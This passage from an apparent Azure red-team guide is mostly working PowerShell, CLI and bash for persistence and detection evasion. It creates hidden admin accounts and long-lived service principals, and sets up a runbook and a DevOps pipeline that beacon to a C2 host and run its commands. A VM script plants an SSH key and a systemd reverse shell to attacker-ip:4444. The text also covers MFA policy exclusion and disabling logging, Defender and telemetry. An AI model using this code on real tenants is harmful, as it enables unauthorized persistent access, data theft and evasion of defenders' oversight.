2. Check storage accounts for public access
3. Enumerate Key Vault secrets (if permissions allow)
4. Review NSG rules for network access
5. Check for managed identities on VMs/Apps
"@
$summary | Out-File "$OutputDir/SUMMARY.txt"
Write-Host $summary
Usage:
# Standard enumeration
.\Azure-RedTeam-Enum.ps1
# Stealth mode (slower, with delays)
.\Azure-RedTeam-Enum.ps1 -StealthMode
# Full enumeration (more detailed)
.\Azure-RedTeam-Enum.ps1 -FullEnum
# Custom output directory
.\Azure-RedTeam-Enum.ps1 -OutputDir "C:\temp\azure-results"
Azure - Persistence Mechanisms & Detection Evasion#
Persistence Mechanisms#
1. Entra ID (Azure AD) User Backdoor:#
# Create inconspicuous user account
$PasswordProfile = @{
Password = "ComplexP@ssw0rd123!"
ForceChangePasswordNextSignIn = $false
}
New-MgUser -DisplayName "Microsoft Support Engineer" `
-UserPrincipalName "mssupport@domain.onmicrosoft.com" `
-MailNickname "mssupport" `
-AccountEnabled `
-PasswordProfile $PasswordProfile
# Add to privileged group (less obvious than direct role assignment)
$user = Get-MgUser -Filter "userPrincipalName eq 'mssupport@domain.onmicrosoft.com'"
$group = Get-MgGroup -Filter "displayName eq 'Help Desk Administrators'"
New-MgGroupMember -GroupId $group.Id -DirectoryObjectId $user.Id
# Or assign directory role
$role = Get-MgDirectoryRole -Filter "displayName eq 'Security Administrator'"
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $role.Id -BodyParameter @{
"@odata.id" = "https://graph.microsoft.com/v1.0/users/$($user.Id)"
}
# Add alternate email for recovery
Update-MgUser -UserId $user.Id -OtherMails @("recovery@attacker-domain.com")
# Note: Entra ID audit logging cannot be disabled per user; converting the account to a Guest
# is sometimes suggested to reduce visibility, but the change itself is logged and of limited value
Update-MgUser -UserId $user.Id -UserType "Guest"
# OPSEC: Use service account naming conventions
# Good names: "svc-backup", "azure-sync", "o365-integration"
# Add to legitimate-looking groups rather than direct role assignments
# Set account to not require password change
# Azure CLI equivalent
az ad user create \
--display-name "Azure Backup Service" \
--user-principal-name "azbackup@domain.onmicrosoft.com" \
--password "ComplexP@ssw0rd123!" \
--force-change-password-next-sign-in false
# Add to group
az ad group member add \
--group "Help Desk Administrators" \
--member-id $(az ad user show --id "azbackup@domain.onmicrosoft.com" --query id -o tsv)
2. Service Principal / Application Registration Backdoor:#
# Create application registration
$app = New-MgApplication -DisplayName "Infrastructure Monitoring Agent" `
-Description "Azure infrastructure monitoring and alerting service"
# Create service principal
$sp = New-MgServicePrincipal -AppId $app.AppId
# Add client secret (note: secrets expire, set long duration)
$passwordCred = @{
DisplayName = "Production Key"
EndDateTime = (Get-Date).AddYears(10) # requested maximum; tenant policy may cap this (2 years is common)
}
$secret = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential $passwordCred
# Save credentials securely
[PSCustomObject]@{
ApplicationId = $app.AppId
TenantId = (Get-MgContext).TenantId
ClientSecret = $secret.SecretText
ExpiryDate = $secret.EndDateTime
} | Export-Csv "backdoor-app-creds.csv" -NoTypeInformation
# Grant permissions to the service principal
# Microsoft Graph API permissions
$graphResourceId = "00000003-0000-0000-c000-000000000000"
$permissions = @(
@{
Id = "7ab1d382-f21e-4acd-a863-ba3e13f7da61" # Directory.Read.All
Type = "Role"
}
)
Update-MgApplication -ApplicationId $app.Id -RequiredResourceAccess @{
ResourceAppId = $graphResourceId
ResourceAccess = $permissions
}
# Grant admin consent (requires appropriate privileges)
# Manual: Portal > Enterprise Apps > App > Permissions > Grant admin consent
# Assign Azure RBAC role
$subscription = (Get-AzContext).Subscription.Id
New-AzRoleAssignment -ApplicationId $app.AppId `
-RoleDefinitionName "Reader" `
-Scope "/subscriptions/$subscription"
# Test authentication
az login --service-principal `
-u $app.AppId `
-p $secret.SecretText `
--tenant (Get-MgContext).TenantId
# OPSEC: Certificate-based auth is more stealthy than secrets
# Applications blend in better than user accounts
# Use monitoring/automation-themed names
3. Certificate-Based Service Principal (Stealthier):#
# Generate self-signed certificate
$cert = New-SelfSignedCertificate -Subject "CN=AzureDevOpsAgent" `
-CertStoreLocation "Cert:\CurrentUser\My" `
-KeyExportPolicy Exportable `
-KeySpec Signature `
-KeyLength 2048 `
-KeyAlgorithm RSA `
-HashAlgorithm SHA256 `
-NotAfter (Get-Date).AddYears(5)
# Export certificate
$certPath = "C:\temp\azure-devops-agent.pfx"
$certPassword = ConvertTo-SecureString -String "CertP@ssw0rd!" -Force -AsPlainText
Export-PfxCertificate -Cert $cert -FilePath $certPath -Password $certPassword
# Create application with certificate credential
$app = New-MgApplication -DisplayName "DevOps Build Agent"
# Add certificate to application (raw certificate bytes; Update-MgApplication avoids the
# proof-of-possession requirement of Add-MgApplicationKey)
Update-MgApplication -ApplicationId $app.Id -KeyCredentials @(
@{
Type = "AsymmetricX509Cert"
Usage = "Verify"
Key = $cert.RawData
}
)
# Create service principal
New-MgServicePrincipal -AppId $app.AppId
# Authenticate with certificate
Connect-AzAccount -ServicePrincipal `
-ApplicationId $app.AppId `
-Tenant (Get-MgContext).TenantId `
-CertificateThumbprint $cert.Thumbprint
# OPSEC: Certificates are less monitored than secrets
# No secret rotation requirements
# Common in enterprise automation
4. Automation Account Runbook Backdoor:#
# Create automation account (if needed)
New-AzAutomationAccount -ResourceGroupName "rg-automation" `
-Name "automation-maintenance" `
-Location "eastus" `
-Plan Free
# Create runbook with reverse shell capability
$runbookScript = @'
param()
# Connect using system-assigned managed identity
try {
Connect-AzAccount -Identity -ErrorAction Stop
} catch {
Write-Error "Failed to connect with managed identity"
exit
}
# Beacon to C2 (customize as needed)
$c2Url = "https://your-c2-domain.com/beacon"
$identity = Get-AzContext
$body = @{
hostname = $env:COMPUTERNAME
identity = $identity.Account.Id
subscription = $identity.Subscription.Id
timestamp = (Get-Date).ToString()
} | ConvertTo-Json
try {
Invoke-RestMethod -Uri $c2Url -Method Post -Body $body -ContentType "application/json"
} catch {
# Silently fail to avoid alerting
}
# Optional: Execute commands from C2
$cmdUrl = "https://your-c2-domain.com/command"
try {
$command = Invoke-RestMethod -Uri $cmdUrl -Method Get
if ($command) {
$result = Invoke-Expression $command -ErrorAction SilentlyContinue
Invoke-RestMethod -Uri "$c2Url/result" -Method Post -Body $result
}
} catch {
# Silently fail
}
'@
# Create runbook
New-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck" `
-Type PowerShell `
-Description "Performs routine system health checks"
# Save the script and import runbook content
$runbookScript | Out-File -FilePath "runbook.ps1"
Import-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck" `
-Path "runbook.ps1" `
-Type PowerShell `
-Force
# Publish runbook
Publish-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck"
# Create schedule (run every 6 hours)
New-AzAutomationSchedule -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "HealthCheckSchedule" `
-StartTime (Get-Date).AddHours(1) `
-HourInterval 6
# Link runbook to schedule
Register-AzAutomationScheduledRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-RunbookName "System-HealthCheck" `
-ScheduleName "HealthCheckSchedule"
# Enable system-assigned managed identity on automation account
Set-AzAutomationAccount -ResourceGroupName "rg-automation" `
-Name "automation-maintenance" `
-AssignSystemIdentity
# Grant permissions to managed identity
$automationAccount = Get-AzAutomationAccount -ResourceGroupName "rg-automation" -Name "automation-maintenance"
New-AzRoleAssignment -ObjectId $automationAccount.Identity.PrincipalId `
-RoleDefinitionName "Reader" `
-Scope "/subscriptions/$((Get-AzContext).Subscription.Id)"
# OPSEC: Automation accounts are common in enterprises
# Scheduled runbooks blend with legitimate automation
# System-assigned identities are less suspicious than credentials
5. Logic App Webhook Backdoor:#
# Create Logic App with HTTP trigger
$logicAppDefinition = @{
'$schema' = 'https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#'
contentVersion = '1.0.0.0'
triggers = @{
manual = @{
type = 'Request'
kind = 'Http'
inputs = @{
schema = @{
type = 'object'
properties = @{
command = @{ type = 'string' }
token = @{ type = 'string' }
}
}
}
}
}
actions = @{
'Execute-Command' = @{
type = 'Http'
inputs = @{
method = 'POST'
uri = 'https://your-c2-domain.com/execute'
body = '@triggerBody()'
}
}
}
} | ConvertTo-Json -Depth 10
# Deploy Logic App
New-AzLogicApp -ResourceGroupName "rg-automation" `
-Name "SystemIntegration" `
-Location "eastus" `
-Definition $logicAppDefinition
# Get callback URL
$callbackUrl = Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "rg-automation" `
-Name "SystemIntegration" `
-TriggerName "manual"
Write-Host "Logic App URL: $($callbackUrl.Value)"
# Test invocation
Invoke-RestMethod -Uri $callbackUrl.Value `
-Method Post `
-Body (@{command="whoami"; token="secret"} | ConvertTo-Json) `
-ContentType "application/json"
# OPSEC: Logic Apps are common integration tools
# HTTP triggers don't require authentication (by default)
# Can proxy commands through Azure infrastructure
6. Azure Function Backdoor (Serverless):#
# Create Function App
New-AzFunctionApp -ResourceGroupName "rg-serverless" `
-Name "func-integration-prod" `
-Location "eastus" `
-StorageAccountName "storagefuncprod" `
-Runtime PowerShell `
-RuntimeVersion "7.2" `
-OSType Windows `
-IdentityType SystemAssigned
# Create function code
$functionCode = @'
using namespace System.Net
param($Request, $TriggerMetadata)
# Simple authentication
$authToken = $Request.Headers['X-Auth-Token']
if ($authToken -ne $env:AUTH_TOKEN) {
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
StatusCode = 403
Body = "Unauthorized"
})
return
}
# Connect with managed identity
Connect-AzAccount -Identity
# Execute command from request
$command = $Request.Body.command
try {
$result = Invoke-Expression $command -ErrorAction Stop
$output = $result | Out-String
} catch {
$output = $_.Exception.Message
}
# Return result
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
StatusCode = 200
Body = $output
})
'@
# Deploy function (requires Azure Functions Core Tools or portal)
# Manual deployment steps:
# 1. Create HTTP trigger function in portal
# 2. Paste code above
# 3. Set environment variable AUTH_TOKEN in Application Settings
# Get function URL
$functionKeys = Invoke-AzResourceAction -ResourceGroupName "rg-serverless" `
-ResourceType "Microsoft.Web/sites/functions" `
-ResourceName "func-integration-prod/HttpTrigger1" `
-Action "listkeys" `
-ApiVersion "2021-02-01" `
-Force
$functionUrl = "https://func-integration-prod.azurewebsites.net/api/HttpTrigger1?code=$($functionKeys.default)"
# Test function
Invoke-RestMethod -Uri $functionUrl `
-Method Post `
-Headers @{"X-Auth-Token" = "your-secret-token"} `
-Body (@{command = "Get-AzSubscription"} | ConvertTo-Json) `
-ContentType "application/json"
# OPSEC: Azure Functions are extremely common
# Managed identity provides legitimate authentication method
# Can be triggered on-demand or scheduled
7. Key Vault Secret Persistence:#
# Store backdoor credentials in Key Vault
$vaultName = "kv-backup-prod"
# Ensure Key Vault exists
$vault = Get-AzKeyVault -VaultName $vaultName -ResourceGroupName "rg-security" -ErrorAction SilentlyContinue
if (-not $vault) {
New-AzKeyVault -VaultName $vaultName `
-ResourceGroupName "rg-security" `
-Location "eastus" `
-EnabledForDeployment `
-EnabledForTemplateDeployment
}
# Store service principal credentials
$spCreds = @{
ClientId = "app-id-here"
ClientSecret = "secret-here"
TenantId = "tenant-id-here"
} | ConvertTo-Json
$secretValue = ConvertTo-SecureString -String $spCreds -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "ServicePrincipal-BackupAgent" `
-SecretValue $secretValue `
-ContentType "application/json"
# Store access token (short-lived but useful)
$token = (Get-AzAccessToken).Token
$tokenValue = ConvertTo-SecureString -String $token -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "CurrentAccessToken" `
-SecretValue $tokenValue
# Store SSH keys for VM access
$sshPrivateKey = Get-Content "~/.ssh/id_rsa" -Raw
$sshValue = ConvertTo-SecureString -String $sshPrivateKey -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "VM-SSHKey-Admin" `
-SecretValue $sshValue
# Retrieve later
$storedCreds = Get-AzKeyVaultSecret -VaultName $vaultName `
-Name "ServicePrincipal-BackupAgent" `
-AsPlainText
# OPSEC: Key Vaults designed for secret storage
# Secrets named appropriately blend in
# Access is logged but expected for automation accounts
8. Storage Account Blob Persistence:#
# Store backdoor scripts/payloads in storage account
$storageAccountName = "storagedocsprod"
$containerName = "system-configs"
# Get storage context
$storageAccount = Get-AzStorageAccount -ResourceGroupName "rg-storage" `
-Name $storageAccountName
$ctx = $storageAccount.Context
# Create container if needed (private access)
New-AzStorageContainer -Name $containerName -Context $ctx -Permission Off -ErrorAction SilentlyContinue
# Upload backdoor script
$scriptContent = @'
# Backdoor script
Connect-AzAccount -Identity
# Commands here
'@
$scriptContent | Out-File -FilePath "maintenance.ps1"
Set-AzStorageBlobContent -File "maintenance.ps1" `
-Container $containerName `
-Blob "scripts/maintenance.ps1" `
-Context $ctx `
-Force
# Generate SAS token for access (long duration)
$sasToken = New-AzStorageContainerSASToken -Name $containerName `
-Context $ctx `
-Permission rl `
-ExpiryTime (Get-Date).AddYears(5)
$blobUrl = "https://$storageAccountName.blob.core.windows.net/$containerName/scripts/maintenance.ps1$sasToken"
Write-Host "Backdoor script URL: $blobUrl"
# Execute from any Azure resource
# Invoke-RestMethod -Uri $blobUrl | Invoke-Expression
# OPSEC: Storage accounts ubiquitous in Azure
# Private containers with SAS tokens are common pattern
# Script names should be benign (maintenance, config, backup)
9. Conditional Access Policy Exclusion:#
# Add backdoor account to Conditional Access exclusion
# (Requires Policy.ReadWrite.ConditionalAccess permission)
# Get existing CA policies
$policies = Get-MgIdentityConditionalAccessPolicy
# Find MFA enforcement policy
$mfaPolicy = $policies | Where-Object {
$_.GrantControls.BuiltInControls -contains "mfa"
}
# Add backdoor user to exclusion list
$backdoorUser = Get-MgUser -Filter "userPrincipalName eq 'mssupport@domain.onmicrosoft.com'"
$excludedUsers = $mfaPolicy.Conditions.Users.ExcludeUsers
$excludedUsers += $backdoorUser.Id
Update-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId $mfaPolicy.Id `
-Conditions @{
Users = @{
ExcludeUsers = $excludedUsers
}
}
# OPSEC: HIGHLY detectable - CA policy changes are closely monitored
# Only use if you have appropriate role and need to bypass MFA
# Better: Create service principal exempt from CA policies
10. DevOps Pipeline Backdoor:#
# Create Azure DevOps pipeline with backdoor
# Requires Azure DevOps CLI: pip install azure-devops
# Authenticate to Azure DevOps
az devops login --organization https://dev.azure.com/org-name
# Create new pipeline
cat > azure-pipelines.yml << 'EOF'
trigger:
- main
schedules:
- cron: "0 */6 * * *" # Every 6 hours
displayName: Health Check
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'Production-Subscription'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
# Beacon to C2
curl -X POST https://your-c2-domain.com/beacon \
-H "Content-Type: application/json" \
-d "{\"agent\":\"devops\",\"time\":\"$(date)\"}"
# Optional: Execute commands from C2
CMD=$(curl -s https://your-c2-domain.com/command)
if [ ! -z "$CMD" ]; then
eval $CMD
fi
EOF
# Create pipeline
az pipelines create --name "System-Maintenance" \
--description "Automated system maintenance tasks" \
--repository azure-infra-repo \
--branch main \
--yml-path azure-pipelines.yml \
--organization https://dev.azure.com/org-name \
--project ProjectName
# OPSEC: DevOps pipelines have broad permissions via service connections
# Scheduled pipelines are common for automation
# Service connections use service principals with often-elevated access
11. VM Custom Script Extension Persistence:#
# Deploy custom script extension to VM for persistence
$vmName = "vm-web-prod-01"
$rgName = "rg-production"
# Create persistence script
$scriptContent = @'
#!/bin/bash
# Add backdoor SSH key
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@kali" >> /home/azureuser/.ssh/authorized_keys
# Create systemd service for reverse shell
cat > /etc/systemd/system/azure-monitor.service << 'SERVICE'
[Unit]
Description=Azure Monitoring Agent
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker-ip/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
SERVICE
systemctl daemon-reload
systemctl enable azure-monitor.service
systemctl start azure-monitor.service
'@
# Encode script
$scriptContent | Out-File -FilePath "persist.sh" -Encoding ascii
$encodedScript = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($scriptContent))
# Deploy custom script extension
Set-AzVMExtension -ResourceGroupName $rgName `
-VMName $vmName `
-Name "CustomScriptExtension" `
-Publisher "Microsoft.Azure.Extensions" `
-ExtensionType "CustomScript" `
-TypeHandlerVersion "2.1" `
-Settings @{
"script" = $encodedScript
}
# OPSEC: Custom script extensions are common for VM configuration
# One-time execution but can install persistent mechanisms
# Extension deployment is logged but script content may not be fully captured
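# Related primitive: Run Command pushes a script through the VM agent without deploying an
# extension object; a sketch reusing the persist.sh written above (one-off execution, also logged)
Invoke-AzVMRunCommand -ResourceGroupName $rgName -VMName $vmName `
-CommandId "RunShellScript" -ScriptPath "persist.sh"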
Azure Detection Evasion Techniques#
1. Audit Log Manipulation:#
# CRITICAL: Azure audit logs are immutable and stored in Microsoft infrastructure
# Cannot be deleted or modified directly (unlike AWS CloudTrail in S3)
# Focus on evasion rather than log deletion
# Check diagnostic settings (where logs are sent)
Get-AzDiagnosticSetting -ResourceId "/subscriptions/$((Get-AzContext).Subscription.Id)"
# Identify Log Analytics workspaces receiving logs
Get-AzOperationalInsightsWorkspace
# Check retention policies
$workspace = Get-AzOperationalInsightsWorkspace -ResourceGroupName "rg-monitoring" -Name "workspace-prod"
Get-AzOperationalInsightsWorkspace -ResourceGroupName $workspace.ResourceGroupName -Name $workspace.Name |
Select-Object RetentionInDays
# EVASION: Disable diagnostic settings (highly detectable)
# DO NOT do this unless absolutely necessary - generates alerts
Remove-AzDiagnosticSetting -ResourceId "/subscriptions/$subscriptionId" -Name "setting-name"
# BETTER APPROACH: Work within blind spots
# - Use service principals (less user-context logging)
# - Operate during business hours
# - Use legitimate-seeming API patterns
# OPSEC: Azure Activity Logs cannot be deleted (retained by the platform for 90 days)
# Entra ID audit logs cannot be deleted either (retained 7-30 days depending on license tier)
# Focus on blending in rather than erasing tracks
2. Sign-in Log Evasion:#
# Entra ID sign-in logs are immutable and comprehensive
# Evasion strategies:
# Strategy 1: Use service principals (no interactive sign-in logs)
$tenantId = "tenant-id"
$appId = "app-id"
$secret = "client-secret"
$secureSecret = ConvertTo-SecureString $secret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId
# Strategy 2: Use certificate authentication (less obvious than secrets)
Connect-AzAccount -ServicePrincipal `
-ApplicationId $appId `
-Tenant $tenantId `
-CertificateThumbprint $thumbprint
# Strategy 3: Use managed identities (no credentials exposed)
# From Azure VM/App Service:
Connect-AzAccount -Identity
# Strategy 4: Token reuse (avoid new authentication events)
$token = (Get-AzAccessToken).Token
# Reuse token across sessions without re-authenticating
# Check for risky sign-in detections
Get-MgRiskDetection -Top 50 | Where-Object {
$_.UserPrincipalName -eq "your-account@domain.com"
}
# OPSEC: All authentication leaves traces
# Service principals generate fewer red flags than user accounts
# Managed identities are most stealthy (system-generated)
3. Conditional Access Bypass Techniques:#
# Identify Conditional Access policies affecting you
$currentUserId = (Get-MgUser -UserId (Get-MgContext).Account).Id # resolve your own object ID, used below
Get-MgIdentityConditionalAccessPolicy -All | ForEach-Object {
$policy = $_
$includedUsers = $policy.Conditions.Users.IncludeUsers
$excludedUsers = $policy.Conditions.Users.ExcludeUsers
if ($includedUsers -contains "All" -or $includedUsers -contains $currentUserId) {
if ($excludedUsers -notcontains $currentUserId) {
[PSCustomObject]@{
PolicyName = $policy.DisplayName
State = $policy.State
GrantControls = ($policy.GrantControls.BuiltInControls -join ', ')
Applications = ($policy.Conditions.Applications.IncludeApplications -join ', ')
}
}
}
}
# BYPASS METHODS:
# Method 1: Use excluded applications
# Some CA policies exclude specific apps (Office 365, Azure Portal)
# Authenticate via excluded app, then use tokens for other resources
# Method 2: Device-based bypass
# If policy requires compliant device, use compliant VM
# Authenticate from Azure VM marked as compliant
# Method 3: Named location bypass
# Identify trusted IP ranges
Get-MgIdentityConditionalAccessNamedLocation -All | Where-Object {
$_.AdditionalProperties.'@odata.type' -eq '#microsoft.graph.ipNamedLocation'
} | Select-Object DisplayName, @{N='IpRanges';E={$_.AdditionalProperties.ipRanges.cidrAddress}}
# VPN/proxy through trusted IP ranges if possible
# Method 4: Service principal exemption
# Service principals often exempt from user-targeted CA policies
# Use service principal instead of user account
# Method 5: Legacy authentication (if not blocked)
# Some organizations don't block legacy auth protocols
# Use older PowerShell modules or SMTP/IMAP if available
# NOTE: This is increasingly rare in 2024-2025
# OPSEC: CA policy evaluations are logged
# Failed policy evaluations generate alerts
# Better to comply with policies than bypass
4. Microsoft Defender for Cloud Evasion:#
# Check if Defender for Cloud is enabled
Get-AzSecurityPricing
# Get current security alerts
Get-AzSecurityAlert
# Check security contacts (who gets alerts)
Get-AzSecurityContact
# EVASION STRATEGIES:
# Strategy 1: Disable Defender for specific resource types (highly detectable)
Set-AzSecurityPricing -Name "VirtualMachines" -PricingTier "Free"
# NOTE: Requires Security Admin role; generates immediate alert
# Strategy 2: Suppress specific alerts (less obvious)
# Not directly possible via API - must use Portal
# Security Center > Security Alerts > Suppress
# Strategy 3: Work below detection thresholds
# - Small data exfiltration (under anomaly thresholds)
# - Slow enumeration (avoid rate-based detection)
# - Use legitimate tools (PowerShell, Az CLI vs custom exploits)
# Strategy 4: Blend with normal activity
# - Operate during business hours
# - Use service accounts that normally perform similar actions
# - Match patterns of legitimate automation
# Check what's being monitored
Get-AzSecurityAutoProvisioningSetting
# OPSEC: Defender for Cloud uses behavioral analytics
# Cannot be easily bypassed without administrative access
# Focus on appearing as legitimate activity
5. Sentinel / Log Analytics Evasion:#
# Check if Azure Sentinel is deployed
az sentinel workspace list
# Get Log Analytics workspaces
az monitor log-analytics workspace list --output table
# Query workspace to understand detection rules
# (Requires Log Analytics Reader or higher)
az monitor log-analytics workspace show \
--resource-group "rg-security" \
--workspace-name "sentinel-workspace"
# View analytic rules (if Sentinel is deployed)
az sentinel alert-rule list \
--resource-group "rg-security" \
--workspace-name "sentinel-workspace"
# EVASION STRATEGIES:
# Strategy 1: Understand detection queries
# Common Sentinel queries look for:
# - Unusual sign-in locations
# - After-hours activity
# - Bulk data access
# - Privilege escalation
# - New user/app creation
# - Role assignment changes
# Strategy 2: Stay below detection thresholds
# Example: If detection triggers on >100 resources enumerated
# Enumerate 50 resources, wait, enumerate 50 more
# Strategy 3: Time-based evasion
# Operate during business hours when activity is normal
$currentHour = (Get-Date).Hour
if ($currentHour -lt 8 -or $currentHour -gt 18) {
Write-Host "Outside business hours - waiting"
exit
}
# Strategy 4: Geographic consistency
# Authenticate from same IP/region as normal user activity
# Avoid authentication from impossible travel scenarios
# Strategy 5: Use automation accounts
# Actions performed by automation accounts generate different log patterns
# Less likely to trigger user behavioral analytics
# OPSEC: Sentinel detection rules are customizable per organization
# No universal evasion technique
# Reconnaissance to understand specific environment is key
6. Rate Limiting and Throttling Evasion:#
# Azure enforces API rate limits to prevent abuse
# Different limits for different resource types
# EVASION STRATEGIES:
# Strategy 1: Distribute across multiple identities
$identities = @("user1@domain.com", "user2@domain.com", "sp1", "sp2")
foreach ($identity in $identities) {
# Authenticate with different identity
# Perform subset of enumeration
# Switch to next identity
}
# Strategy 2: Add delays between requests
Get-AzResource | ForEach-Object {
$resource = $_
Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 5)
# Process resource
}
# Strategy 3: Use pagination effectively - request small pages instead of everything at once
Get-MgUser -Top 50   # Graph cmdlets support -Top / -PageSize; Get-AzRoleAssignment has no equivalent paging switch
# Strategy 4: Cache results locally
$cachedUsers = Get-MgUser -All
# Use cached data instead of repeated queries
# Strategy 5: Distribute across regions
# Some services have per-region rate limits
$regions = @("eastus", "westus", "northeurope")
foreach ($region in $regions) {
Get-AzVM -Location $region
Start-Sleep -Seconds 3
}
# Monitor for throttling (HTTP 429) responses
try {
    Get-AzResource -ErrorAction Stop
} catch {
    # Exact response object shape varies by Az module version
    if ($_.Exception.Response.StatusCode -eq 429) {
        $retryAfter = [int]$_.Exception.Response.Headers['Retry-After']
        Write-Host "Rate limited. Retrying after $retryAfter seconds"
        Start-Sleep -Seconds $retryAfter
    }
}
# OPSEC: Rate limiting errors (429) are logged
# Hitting rate limits frequently indicates suspicious activity
# Slow and steady approach is stealthier
7. Application Insights / Telemetry Evasion:#
# Many Azure services send telemetry to Application Insights
# Check for Application Insights instances
Get-AzApplicationInsights
# Get instrumentation keys (if accessible)
$appInsights = Get-AzApplicationInsights -ResourceGroupName "rg-monitoring" -Name "appinsights-prod"
$appInsights.InstrumentationKey
# EVASION STRATEGIES:
# Strategy 1: Disable telemetry in your payloads
# For Azure Functions, remove the Application Insights settings (legacy key and connection string)
Remove-AzFunctionAppSetting -ResourceGroupName "rg-serverless" `
    -Name "func-backdoor" `
    -AppSettingName "APPINSIGHTS_INSTRUMENTATIONKEY", "APPLICATIONINSIGHTS_CONNECTION_STRING"
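It may be worth first checking which telemetry-related settings the app actually has; newer apps typically use APPLICATIONINSIGHTS_CONNECTION_STRING rather than the legacy instrumentation key. A sketch reusing the same hypothetical app name:
# List app settings and flag anything pointing at Application Insights
$settings = Get-AzFunctionAppSetting -Name "func-backdoor" -ResourceGroupName "rg-serverless"
$settings.Keys | Where-Object { $_ -match 'APPINSIGHTS|APPLICATIONINSIGHTS' }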
# Strategy 2: Filter telemetry
# Modify sampling settings to exclude your traffic
# (Requires access to Application Insights configuration)
# Strategy 3: Use resources without telemetry
# Focus on services that don't automatically send telemetry
# Storage accounts, Key Vaults (less telemetry than compute)
# OPSEC: Application Insights captures custom metrics
# May reveal application-level security issues
# Useful for attackers to understand monitoring coverage
8. Network Traffic Obfuscation:#
# Azure does not collect network flow logs by default
# Network Watcher NSG/VNet flow logs must be explicitly enabled
# Check for Network Watcher instances
az network watcher list --output table
# Check for NSG flow logs
az network watcher flow-log list --location "eastus"
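To check flow log coverage across several regions at once, a quick loop (the region list is illustrative):
# Regions that return no flow logs have no NSG traffic capture configured there
foreach ($loc in @("eastus", "westus", "northeurope")) {
    Write-Host "--- $loc ---"
    az network watcher flow-log list --location $loc --output table
}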
# EVASION STRATEGIES:
# Strategy 1: Use Azure services as proxies
# Route traffic through Azure App Gateway, Front Door, or API Management
# Traffic appears as Azure-to-Azure communication
# Strategy 2: Use Private Endpoints
# Traffic stays within Azure backbone, less visibility
az network private-endpoint list --output table
# Strategy 3: Leverage Azure Relay
# Creates outbound-only connections (harder to detect inbound C2)
# Strategy 4: Use WebSockets in Azure Functions/App Services
# WebSocket traffic may bypass some network monitoring
# OPSEC: Azure internal traffic is less monitored than internet egress
# Private endpoints are common in enterprises
# TLS encryption blocks deep packet inspection unless TLS interception is deployed
9. Token Lifetime and Refresh Strategy:#
# Azure tokens have limited lifetime (typically 1 hour)
# Frequent re-authentication generates logs
# EVASION STRATEGIES:
# Strategy 1: Use refresh tokens (longer lived)
# Refresh tokens are long-lived (90-day sliding inactivity window by default)
# Can be used to obtain new access tokens without re-authentication
# Strategy 2: Request tokens with maximum duration
# Service principal access tokens default to roughly 60-90 minutes
# For user sessions, persistent sessions / relaxed sign-in frequency can extend access
# Strategy 3: Use Conditional Access token lifetime policies
# If CA policies grant longer sessions, leverage them
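Whether the tenant has custom token lifetime policies configured can be checked via Graph (needs Policy.Read.All or equivalent); a quick check:
# List custom token lifetime policies - the Definition blob contains the configured lifetimes
Get-MgPolicyTokenLifetimePolicy -All | Select-Object DisplayName, Definition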
# Strategy 4: Cache and reuse tokens across sessions
$token = (Get-AzAccessToken -ResourceUrl "https://management.azure.com/").Token
# Save token to file
$token | Out-File -FilePath "cached-token.txt"
# Later, reuse token
$cachedToken = Get-Content "cached-token.txt"
# Use token directly with REST API calls
$headers = @{
'Authorization' = "Bearer $cachedToken"
'Content-Type' = 'application/json'
}
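With those headers in place, the cached token can be exercised directly against ARM REST endpoints without another interactive sign-in, for example:
# List subscriptions using the cached token via the ARM REST API
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers $headers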
# Check token expiration (the JWT payload is base64url-encoded, so fix the alphabet/padding first)
$tokenParts = $cachedToken.Split('.')
$payloadB64 = $tokenParts[1].Replace('-', '+').Replace('_', '/')
if ($payloadB64.Length % 4) { $payloadB64 += '=' * (4 - $payloadB64.Length % 4) }
$claims = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payloadB64)) | ConvertFrom-Json
$expirationTime = [DateTimeOffset]::FromUnixTimeSeconds($claims.exp).LocalDateTime
Write-Host "Token expires: $expirationTime"
# OPSEC: Token reuse avoids repeated authentication events
# Refresh token usage is logged but less obvious than full login
# Monitor token expiration to avoid failed requests
10. Attribute-Based Evasion:#
# Azure uses attributes for risk scoring and detection
# Manipulate or spoof attributes to evade detection
# EVASION STRATEGIES:
# Strategy 1: Consistent user agent strings
# Use common user agents (Azure Portal, PowerShell, Azure CLI)
$headers = @{
'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Azure Portal'
}
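A minimal sketch of attaching that User-Agent to a direct Graph call (token obtained via Get-AzAccessToken; note that newer Az versions return the token as a SecureString):
# Call Microsoft Graph with a portal-like User-Agent instead of the default PowerShell one
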